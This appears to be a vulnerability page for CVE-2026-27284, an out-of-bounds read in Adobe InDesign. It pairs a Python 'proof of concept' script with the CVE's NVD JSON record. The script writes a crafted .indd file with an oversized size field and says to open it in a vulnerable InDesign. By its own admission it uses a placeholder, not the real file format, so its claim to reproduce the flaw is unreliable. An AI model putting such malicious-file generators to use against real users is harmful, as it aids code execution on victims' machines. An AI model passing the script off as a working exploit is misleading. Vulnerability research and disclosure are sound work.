CVE-2026-27284

# Proof of Concept (PoC) for CVE-2026-27284 # This script generates a crafted file intended to trigger the OOB Read. # Usage: python poc.py import struct def generate_malicious_file(filename): """ Generates a crafted InDesign file structure. Note: Actual InDesign file format (.indd) is complex and proprietary. This is a simplified representation to demonstrate the trigger. """ # Placeholder file header (Magic bytes) file_header = b"\x06\x06\xED\xF5\x00\x00\x00\x00" # Construct a malicious record # The size field is manipulated to force an out-of-bounds read record_type = struct.pack('<I', 0x4D4C4452) # 'MLDR' placeholder # Large size value to trigger read past end of buffer malicious_size = struct.pack('<I', 0xFFFFFFFF) # Padding data padding = b"A" * 0x100 payload = file_header + record_type + malicious_size + padding with open(filename, "wb") as f: f.write(payload) print(f"[+] Malicious file generated: {filename}") print("[+] Open this file in a vulnerable version of Adobe InDesign to reproduce the issue.") if __name__ == "__main__": generate_malicious_file("cve_2026_27284_poc.indd")

{"cve": {"id": "CVE-2026-27284", "sourceIdentifier": "[email protected]", "published": "2026-04-14T17:16:48.040", "lastModified": "2026-04-16T15:35:38.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "InDesign Desktop versions 20.5.2, 21.2 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.5.3", "matchCriteriaId": "5644C156-EB3C-4F24-A9E8-ABB5EA61F2A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:indesign:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.0", "versionEndExcluding": "21.3", "matchCriteriaId": "C6F7C5A5-F818-4184-81C3-35282D05CBEA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/indesign/apsb26-32.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}